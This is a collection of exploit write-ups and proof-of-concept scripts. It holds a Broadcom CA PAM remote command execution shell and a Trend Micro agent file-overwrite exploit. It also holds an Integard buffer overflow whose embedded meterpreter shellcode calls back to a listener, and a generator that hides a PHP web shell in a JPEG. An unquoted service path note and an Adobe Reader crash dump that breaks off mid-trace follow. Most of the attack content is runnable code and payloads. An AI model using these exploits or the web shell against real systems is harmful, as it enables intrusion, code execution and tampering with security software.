
-
Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
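# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2
#
# Review notes (ported from the original Python 2 PoC to Python 3; the
# requests sent are byte-for-byte the same):
#   - Stage 1: send_command() injects a shell command into the importID
#     parameter of ajax_cmd.php (unauthenticated). Every stage below is run
#     through that injection, including "mysql -u root uag", so the web tier
#     can talk to the local database as root.
#   - Stage 2: encode_payload() stores "'; <cmd> > /tmp/output; '" in the
#     ssl_vpn_network row of configuration_f, then "openvpn" is written to a
#     local service on 127.0.0.1:2210.  That service presumably regenerates
#     the VPN configuration from the row in a shell context and thereby runs
#     <cmd> - most likely with higher privileges than the web server, which
#     would be the point of the second stage (not verifiable from here).
#   - The original only restored the row on the happy path; an exception
#     between the UPDATE and restore_sql() left the appliance's VPN
#     configuration corrupted.  run_command() now restores in a finally block.
#   - get_db_value() raised a bare IndexError when the mysql output did not
#     have the expected two lines; it now raises a descriptive RuntimeError.
#   - TLS verification is disabled on purpose (appliances ship self-signed
#     certificates).  Do not copy `ctx` into anything that is not a lab PoC.

import base64
import json
import ssl
import sys
import urllib.parse
import urllib.request

# Target address; set by main() and used by helpers that are not given one.
ip = None

# Intentionally insecure TLS context - see review notes above.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    """Run *cmd* on the appliance through the ajax_cmd.php injection.

    The command is placed after a ``|`` in the importID parameter;
    ``+2>%261||`` decodes to ``2>&1 ||`` so stderr is captured and the rest
    of the original command line is skipped.

    Returns the 'responseData' field of the JSON reply.
    Raises urllib.error.URLError/HTTPError on transport errors and
    KeyError/ValueError if the reply is not the expected JSON.
    """
    quoted = urllib.parse.quote_plus(cmd)
    url = ('https://' + ip + '/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'
           + quoted + '+2>%261||&deviceMode=test')
    request = urllib.request.Request(url, None)
    with urllib.request.urlopen(request, context=ctx) as response:
        result = json.load(response)
    return result['responseData']


def get_db_value(target=None):
    """Return the current value of the ssl_vpn_network configuration row.

    The mysql client prints a column-header line before the value, so the
    value is the second line of output.  Raises RuntimeError if the output
    does not have that shape (instead of the original bare IndexError).
    """
    host = ip if target is None else target
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    lines = send_command(host, cmd).split('\n')
    if len(lines) < 2:
        raise RuntimeError('unexpected mysql output while reading ssl_vpn_network: %r' % (lines,))
    return lines[1]


def encode_payload(cmd):
    """Build the shell command that plants *cmd* in the ssl_vpn_network row.

    The SQL is base64-encoded so quotes and redirects survive URL quoting
    and the outer shell.  The planted value closes the quoted config
    string, runs *cmd* with output redirected to /tmp/output, and re-opens
    the quote.
    """
    sql_string = ("update configuration_f set value='\\';" + cmd
                  + " > /tmp/output;\\'' where name='ssl_vpn_network'")
    encoded = base64.b64encode(sql_string.encode()).decode('ascii')
    return "echo " + encoded + " | base64 -d | mysql -u root uag "


def restore_sql(value, target=None):
    """Write the original ssl_vpn_network *value* back into the database."""
    host = ip if target is None else target
    sql_string = "update configuration_f set value='" + value + "' where name='ssl_vpn_network'"
    encoded = base64.b64encode(sql_string.encode()).decode('ascii')
    send_command(host, "echo " + encoded + " | base64 -d | mysql -u root uag ")


def run_command(target, cmd):
    """Execute one *cmd* via the config-row trick and return its output.

    The original row value is restored in a ``finally`` block so that a
    transport error half-way through does not leave the VPN configuration
    corrupted.
    """
    orig_value = get_db_value(target)
    try:
        send_command(target, encode_payload(cmd))
        # Poke the local service on port 2210; this appears to make the
        # appliance re-read the row and execute the planted command.
        send_command(target, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        return send_command(target, 'cat /tmp/output')
    finally:
        restore_sql(orig_value, target)


def main():
    """Interactive loop: read a command from stdin, run it, print the output."""
    print('''Xceedium Command Execution PoC by Peter Lapp(lappsec)''')
    if len(sys.argv) != 2:
        print("Usage: xceedium_rce.py <target ip>")
        sys.exit()
    global ip
    ip = sys.argv[1]
    print('Enter commands below. \nType exit to quit')
    while True:
        cmd = input('# ')
        if cmd == "exit":
            sys.exit()
        print(run_command(ip, cmd))


if __name__ == "__main__":
    main()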
-
Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : https://www.netgate.sk/download/download.php?id=11
#Tested on OS: Windows 7

#Analyze PoC :
==============

Both services below start automatically as LocalSystem and have an unquoted BINARY_PATH_NAME containing spaces, so when the Service Control Manager starts them it tries "C:\Program.exe" and "C:\Program Files\NETGATE\Amiti.exe" before the intended binary. This only becomes a privilege escalation if a low-privileged user can create files in C:\ or in C:\Program Files\NETGATE\; on a default Windows installation neither location is writable by standard users, so check the directory ACLs (e.g. with icacls) before rating this higher than a misconfiguration.

C:\Users\ZwX>sc qc AmitiAvHealth
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: AmitiAvHealth
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Health Check
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\ZwX>sc qc AmitiAvSrv
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: AmitiAvSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Engine Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
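# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
# Exploit Author : Peter Lapp
# Exploit Date: 2019-12-05
# Vendor Homepage : https://www.trendmicro.com/en_us/business.html
# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
# CVE: 2019-15627

# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)
# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with arbitrary data hosted elsewhere (with limitations)
# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS,
# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired.
# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file.
# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage,
# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces,
# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that
# are ripe for the writing that can then point to a malicious binary.

# Usage:
# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part.
# 2. Open a browser (preferably IE) and start the script
# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).
# 4. Keep refreshing the page until you see the script create the target file overwritten.
#
# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit.
#
# Review notes (ported from Python 2 to Python 3):
#   - `print ('File %s created.') % filename` is a TypeError under Python 3
#     (print() returns None); fixed.
#   - Watcher.run() looped on `while True`, so Watcher.stop() never made
#     run() return and the process had to be killed by hand after cleanup.
#     run() now loops while the observer thread is alive.  Note that the
#     sys.exit(0) in Stage2_Handler runs on the observer thread and only
#     ends that thread; the process exits once run() returns.
#   - The bare `except: pass` around os.mkdir() is narrowed to OSError.
#   - The set-up code (mkdir, BaitAndSwitch launch, stage 1) moved under a
#     `__main__` guard so importing the module has no side effects.
#   - Temp-file names taken from filesystem events are interpolated into a
#     shell=True command line in symlinkery().  That is only acceptable
#     because TMDS itself generates those names; do not reuse that pattern
#     with names an untrusted party can choose.

import os
import subprocess
import sys
import time
import webbrowser  # imported by the original script; unused

from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

# Module-level watchers; created in main() and referenced from the handlers.
watcher1 = None
watcher2 = None


class Stage1_Handler(FileSystemEventHandler):
    """Stage 1: learn which temp-file names TMDS reuses.

    Every file created under AMSP\\temp\\virus is recorded.  The first name
    seen a second time proves the agent recycles names, at which point
    stage 1 stops and the recorded names go to symlinkery().
    """

    def __init__(self):
        self.filenames = []

    def on_created(self, event):
        filename = os.path.basename(event.src_path)
        if filename in self.filenames:
            print('Starting symlink creation.')
            watcher1.stop()
            symlinkery(self.filenames)
        else:
            self.filenames.append(filename)
            print('File %s created.' % filename)


class Stage2_Handler(FileSystemEventHandler):
    """Stage 2: wait for dsa_control.cmd to be touched, then clean up."""

    def on_any_event(self, event):
        if os.path.basename(event.src_path) != 'dsa_control.cmd':
            return
        print("Target file overwritten/deleted. Cleaning up.")
        subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
        subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True)
        # Tear down the junction at AMSP\temp (the real directory was renamed
        # to temp-orig in symlinkery) and the staging tree, then restore it.
        os.system('rmdir /S /Q "C:\\ProgramData\\Trend Micro\\AMSP\\temp\\"')
        os.system('rmdir /S /Q "C:\\test"')
        os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig',
                  'C:\\ProgramData\\Trend Micro\\AMSP\\temp')
        watcher2.stop()
        sys.exit(0)


class Watcher(object):
    """Thin wrapper around a watchdog Observer watching one directory."""

    def __init__(self, event_handler, path_to_watch):
        self.event_handler = event_handler  # handler *class*; instantiated in run()
        self.path_to_watch = path_to_watch
        self.observer = Observer()

    def run(self):
        """Start observing and block until stop() is called or Ctrl-C."""
        self.observer.schedule(self.event_handler(), self.path_to_watch)
        self.observer.start()
        try:
            # Original looped forever here, so stop() never ended run().
            while self.observer.is_alive():
                time.sleep(1)
        except KeyboardInterrupt:
            self.observer.stop()
        self.observer.join()

    def stop(self):
        self.observer.stop()


def symlinkery(filenames):
    """Point the recycled temp names at the bait file and start stage 2.

    For each recycled name a CreateSymlink.exe process makes
    C:\\test\\virus\\<name> resolve to C:\\test\\test\\symtarget; the
    BaitAndSwitch.exe instance started in main() is (presumably) switching
    that target between dsa_control.cmd and a scratch file.  The agent's
    temp directory is renamed aside and replaced by a junction to C:\\test
    so the agent's next write to a reused name lands on the target, and
    stage 2 waits for dsa_control.cmd to change.
    """
    print("Enter symlinkery")
    for filename in filenames:
        print("Creating symlink for %s" % filename)
        cmdname = "start cmd /c CreateSymlink.exe \"C:\\test\\virus\\%s\" \"C:\\test\\test\\symtarget\"" % filename
        subprocess.Popen(cmdname, shell=True)
    os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp',
              'C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig')
    os.system('mklink /J "C:\\ProgramData\\Trend Micro\\AMSP\\temp" C:\\test')
    watcher2.run()
    print("Watcher 2 started")


def main():
    """Create the staging dir, launch BaitAndSwitch and run stage 1."""
    global watcher1, watcher2
    try:
        os.mkdir('C:\\test')
    except OSError:
        # Usually "already exists" from an earlier run; a real permission
        # problem surfaces at the mklink step anyway.
        pass
    path1 = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp\\virus'
    path2 = 'C:\\Program Files\\Trend Micro\\Deep Security Agent\\'
    watcher1 = Watcher(Stage1_Handler, path1)
    watcher2 = Watcher(Stage2_Handler, path2)
    switcheroo = "start cmd /c BaitAndSwitch.exe C:\\test\\test\\symtarget \"C:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa_control.cmd\" \"C:\\windows\\temp\\deleteme.txt\" d"
    subprocess.Popen(switcheroo, shell=True)
    watcher1.run()


if __name__ == '__main__':
    main()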
-
Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
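#!/usr/bin/env python3
# Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
# Date: 2019-09-22
# Exploit Author: purpl3f0xsecur1ty
# Vendor Homepage: https://www.tucows.com/
# Software Link: http://www.tucows.com/preview/519612/Integard-Home
# Version: Pro 2.2.0.9026 / Home 2.0.0.9021
# Tested on: Windows XP / Win7 / Win10
# CVE: CVE-2019-16702

########################################################
#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
# The vulnerability: Integard fails to sanitize input  #
# to the "NoJs" parameter in an HTTP POST request,     #
# resulting in a stack buffer overflow that overwrites #
# the instruction pointer, leading to remote code      #
# execution.                                           #
########################################################
#
# Review notes (ported from the original Python 2 script):
#   - The menu choice was read with Python 2's input(), which eval()s the
#     typed text.  It now reads a plain line.
#   - Payloads are bytes (struct.pack returns bytes on Python 3) and the
#     request is assembled in build_request(), so both targets share one
#     code path and the buffers can be checked without a live target.
#   - Host and port were hard-coded; they can be passed as argv[1]/argv[2]
#     (defaults unchanged).  socket.send() became sendall() so a short
#     send cannot silently truncate the overflow.
#   - Content-Length is deliberately left at the original value (78), which
#     does not match the real body size.  The exploit was tested that way
#     and the server evidently does not enforce it.

import socket
import sys
from struct import pack

DEFAULT_HOST = "10.0.0.130"
DEFAULT_PORT = 18881

####################################################
# Integard's functionality interferes with reverse #
# and bind shells. Only Meterpreter seems to work. #
####################################################
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
#   -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread
# NOTE: this shellcode calls back to 10.0.0.128:9001.  Regenerate it for
# your own listener with the same bad-character list.
meterpreter = b"\x90" * 50
meterpreter += b"\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4"
meterpreter += b"\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15"
meterpreter += b"\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80"
meterpreter += b"\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e"
meterpreter += b"\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a"
meterpreter += b"\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84"
meterpreter += b"\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27"
meterpreter += b"\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66"
meterpreter += b"\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44"
meterpreter += b"\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86"
meterpreter += b"\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc"
meterpreter += b"\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43"
meterpreter += b"\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06"
meterpreter += b"\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc"
meterpreter += b"\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f"
meterpreter += b"\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab"
meterpreter += b"\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b"
meterpreter += b"\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02"
meterpreter += b"\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85"
meterpreter += b"\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca"
meterpreter += b"\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04"
meterpreter += b"\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56"
meterpreter += b"\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda"
meterpreter += b"\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa"
meterpreter += b"\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94"
meterpreter += b"\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37"
meterpreter += b"\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88"
meterpreter += b"\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80"
meterpreter += b"\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe"
meterpreter += b"\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84"
meterpreter += b"\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f"
meterpreter += b"\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea"
meterpreter += b"\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b"
meterpreter += b"\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d"
meterpreter += b"\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36"
meterpreter += b"\xf9\x7e\x89\x13"


def build_xp_payload():
    """Windows XP: direct EIP overwrite at offset 512.

    Returns the 1500-byte NoJs value: 512 bytes of filler, a JMP ESP from
    iertutil.dll (0x3E087557; no ASLR on XP), the NOP sled + shellcode, and
    'C' padding up to 1500 bytes.
    """
    # JMP ESP at 0x3E087557 in iertutil.dll
    crash = b"A" * 512
    crash += pack("<L", 0x3E087557)
    crash += meterpreter
    crash += b"C" * (1500 - len(crash))
    return crash


def build_win7_payload():
    """Windows 7/10: SEH overwrite.  ASLR IS ON!!! MUST USE NON-ASLR MODULE!

    Layout (low to high): NOP filler, shellcode, 50 NOPs, jumpCall,
    bigBackJump, nSEH, SEH.  SEH is a POP POP RET in integard.exe (not
    ASLR-enabled); nSEH is a short jump 48 bytes back into the NOP pad,
    which slides into jumpCall; jumpCall lands on the CALL at the end of
    bigBackJump, whose pushed return address is popped into ecx, lowered by
    0x300 (three `dec ch`) and jumped to, landing in the sled before the
    shellcode.  Total length is 2784 bytes.
    """
    # POP POP RET in integard.exe (ASLR disabled)
    nSEH = b"\xEB\xD0\x90\x90"  # Jump 48 bytes backwards
    SEH = pack("<L", 0x004042B0)
    jumpCall = b"\xEB\x09"  # Jump 11 bytes forward to hit the CALL in bigBackJump
    bigBackJump = b"\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
    crash = b"\x90" * (2776 - len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
    crash += meterpreter
    crash += b"\x90" * 50
    crash += jumpCall
    crash += bigBackJump
    crash += nSEH
    crash += SEH
    return crash


def build_request(crash, host=DEFAULT_HOST, port=DEFAULT_PORT):
    """Wrap a NoJs value in the /LoginAdmin POST the original exploit sent.

    *crash* is bytes and is placed verbatim in the form body.  The
    Content-Length header is intentionally the original (wrong) 78.
    """
    hostport = ("%s:%d" % (host, port)).encode()
    buffer = b""
    buffer += b"POST /LoginAdmin HTTP/1.1\r\n"
    buffer += b"Host: " + hostport + b"\r\n"
    buffer += b"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
    buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
    buffer += b"Accept-Encoding: gzip, deflate\r\n"
    buffer += b"Referer: http://" + hostport + b"/\r\n"
    buffer += b"Connection: close\r\n"
    buffer += b"Upgrade-Insecure-Requests: 1\r\n"
    buffer += b"Content-Type: application/x-www-form-urlencoded\r\n"
    buffer += b"Content-Length: 78\r\n\r\n"
    buffer += b"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + b"&LoginButtonName=Login\r\n"
    return buffer


def send_payload(host, port, crash):
    """Send one request carrying *crash* and close the socket even on error."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.sendall(build_request(crash, host, port))
    finally:
        s.close()


def main():
    """Ask which target to hit and fire the matching payload."""
    print("~*Integard RCE Exploit for XP/7/10*~")
    host = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PORT
    print("Chose target: (Enter number only)")
    print("1) - Windows XP")
    print("2) - Windows 7/10")
    target = input().strip()
    if target == "1":
        print("[*] Sending Windows XP payload using meterpreter/reverse_tcp")
        send_payload(host, port, build_xp_payload())
        print("[*] Done")
    elif target == "2":
        print("[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp")
        send_payload(host, port, build_win7_payload())
        print("[*] Done")
    else:
        print("[-] Unknown target %r, nothing sent" % target)


if __name__ == "__main__":
    main()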
-
Verot 2.0.3 - Remote Code Execution
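<?php
# Exploit Title: Verot 2.0.3 - Remote Code Execution
# Date: 2019-12-05
# Exploit Author: Jinny Ramsmark
# Vendor Homepage: https://www.verot.net/php_class_upload.htm
# Software Link: https://github.com/verot/class.upload.php
# Version: <=2.0.3
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
# CVE : CVE-2019-19576

#Title: jpeg payload generator for file upload RCE
#Author: Jinny Ramsmark
#Github: https://github.com/jra89/CVE-2019-19576
#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
#Usage: php inject.php
#Output: image.jpg.phar is the file to be used for upload and exploitation
#This script assumes no special transforming is done on the image for this specific CVE.
#It can be modified however for different sizes and so on (x,y vars).
#
# Review notes:
#  - The original looped forever when the image could not be fetched: the
#    failed file_get_contents() returned false (warning hidden by
#    error_reporting(E_PARSE)), an empty image.jpg was written, GD failed on
#    it, tryInject() returned false and the loop fetched again.  Fetching is
#    now checked and the whole search is capped at $max_attempts.
#  - A JPEG already present as image.jpg is used instead of downloading one.
#    The download is plain HTTP from a third-party site and the result is
#    fed straight into GD, so prefer a local image you trust.
#  - findStart() read one byte past the end of the string; the bound is fixed.
#  - imagecreatefromstring() failures are skipped instead of being passed to
#    imagejpeg() (a warning on PHP 7, a fatal TypeError on PHP 8).
#  - The overwrite is kept after the SOS marker so the JPEG headers are never
#    clobbered and $n never goes negative (negative offsets index from the
#    end of the string on PHP 7.1+).
#  - Top-level work moved into main(), only run when this file is the CLI
#    script, so including the file has no side effects.

function main() {
    ini_set('display_errors', 1);
    error_reporting(E_PARSE);  // GD warnings while probing are expected and noisy

    #requires php, php-gd
    $orig = 'image.jpg';
    $code = '<?=exec($_GET["c"])?>';
    $quality = "85";
    $base_url = "http://lorempixel.com";
    $max_attempts = 10;

    echo "-=Imagejpeg injector 1.7=-\n";

    $x = 100;
    $y = 100;
    $url = $base_url . "/$x/$y/";
    for ($attempt = 1; $attempt <= $max_attempts; ++$attempt) {
        if (!file_exists($orig)) {
            echo "[+] Fetching image ($x X $y) from $url\n";
            $image = @file_get_contents($url);
            if ($image === false || $image === '') {
                fwrite(STDERR, "[-] Could not fetch $url; place a JPEG at $orig and re-run\n");
                exit(1);
            }
            file_put_contents($orig, $image);
        }
        if (tryInject($orig, $code, $quality)) {
            echo "[+] It seems like it worked!\n";
            echo "[+] Result file: image.jpg.phar\n";
            return;
        }
    }
    fwrite(STDERR, "[-] No injection point found after $max_attempts attempts\n");
    exit(1);
}

/**
 * Try to embed $code in the entropy-coded data of $orig so that it survives
 * a GD re-encode at $quality.  Writes image.jpg.phar and returns true on
 * success; on failure removes $orig (so the caller fetches a new one) and
 * returns false.
 */
function tryInject($orig, $code, $quality) {
    $result_file = 'image.jpg.phar';
    $tmp_filename = $orig . '_mod2.jpg';

    //Create base image and load its data
    $src = imagecreatefromjpeg($orig);
    if ($src === false) {
        // Not something GD can parse (e.g. an empty or HTML "image").
        unlink($orig);
        return false;
    }
    imagejpeg($src, $tmp_filename, $quality);
    $data = file_get_contents($tmp_filename);

    echo "[+] Jumping to end byte\n";
    $start_byte = findStart($data);
    if ($start_byte < 0) {
        unlink($orig);
        unlink($tmp_filename);
        return false;
    }

    echo "[+] Searching for valid injection point\n";
    $code_len = strlen($code);
    // Walk backwards from the end of the file.  The overwrite window
    // [$i - $code_len + 1, $i] stays after the SOS marker.
    for ($i = strlen($data) - 1; $i >= $start_byte + $code_len; --$i) {
        $tmpData = $data;
        for ($n = $i, $z = $code_len - 1; $z >= 0; --$z, --$n) {
            $tmpData[$n] = $code[$z];
        }
        $src = imagecreatefromstring($tmpData);
        if ($src === false) {
            continue;  // GD rejected the patched data; nothing was written
        }
        imagejpeg($src, $result_file, $quality);
        if (checkCodeInFile($result_file, $code)) {
            unlink($tmp_filename);
            unlink($result_file);
            sleep(1);
            file_put_contents($result_file, $tmpData);
            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
            sleep(1);
            $src = imagecreatefromjpeg($result_file);
            return true;
        }
        unlink($result_file);
    }
    unlink($orig);
    unlink($tmp_filename);
    return false;
}

/**
 * Return the offset just past the first SOS marker (FF DA) in $str, or -1.
 * Stops one byte early so $str[$i+1] is always in range.
 */
function findStart($str) {
    $len = strlen($str);
    for ($i = 0; $i < $len - 1; ++$i) {
        if (ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA) {
            return $i + 2;
        }
    }
    return -1;
}

/** True-ish (the matched tail) if $file exists and contains $code, else false. */
function checkCodeInFile($file, $code) {
    if (file_exists($file)) {
        $contents = loadFile($file);
    } else {
        $contents = "0";
    }
    return strstr($contents, $code);
}

/** Read $file fully as a binary string. */
function loadFile($file) {
    $handle = fopen($file, "r");
    $buffer = fread($handle, filesize($file));
    fclose($handle);
    return $buffer;
}

if (PHP_SAPI === 'cli' && isset($_SERVER['argv'][0]) && realpath($_SERVER['argv'][0]) === __FILE__) {
    main();
}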
-
Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34 eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210212 CoolType!CTInit+0x3913e: 10e6c29e 8902 mov dword ptr [edx],eax ds:002b:707703a4=31a03194 0:000> u @eip-14 CoolType!CTInit+0x3912a: 10e6c28a 8b7d0c mov edi,dword ptr [ebp+0Ch] 10e6c28d 8b571c mov edx,dword ptr [edi+1Ch] 10e6c290 8b7720 mov esi,dword ptr [edi+20h] 10e6c293 035508 add edx,dword ptr [ebp+8] 10e6c296 8b4724 mov eax,dword ptr [edi+24h] 10e6c299 037508 add esi,dword ptr [ebp+8] 10e6c29c 03c6 add eax,esi 10e6c29e 8902 mov dword ptr [edx],eax 0:000> ? poi(edi+1c) Evaluate expression: -690332 = fff57764 0:000> ? 
poi(ebp+8) Evaluate expression: 1887538240 = 70818c40 0:000> !heap -p -a 70818c40 address 70818c40 found in _DPH_HEAP_ROOT @ bfc1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 723d3b94: 70818c40 173c0 - 70818000 19000 unknown!fillpattern 0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240 77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c 77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6 77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 77e7ccee ntdll!RtlAllocateHeap+0x0000003e 0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 77c2f1f6 ucrtbase!_malloc_base+0x00000026 5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9 10e37991 CoolType!CTInit+0x00004831 10e38e1b CoolType!CTInit+0x00005cbb 10e68870 CoolType!CTInit+0x00035710 10e683dc CoolType!CTInit+0x0003527c 10e67d25 CoolType!CTInit+0x00034bc5 10e65902 CoolType!CTInit+0x000327a2 10e633f2 CoolType!CTInit+0x00030292 10e62719 CoolType!CTInit+0x0002f5b9 10e620e8 CoolType!CTInit+0x0002ef88 10e62000 CoolType!CTInit+0x0002eea0 108f36f1 AGM!AGMInitialize+0x0002a881 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 
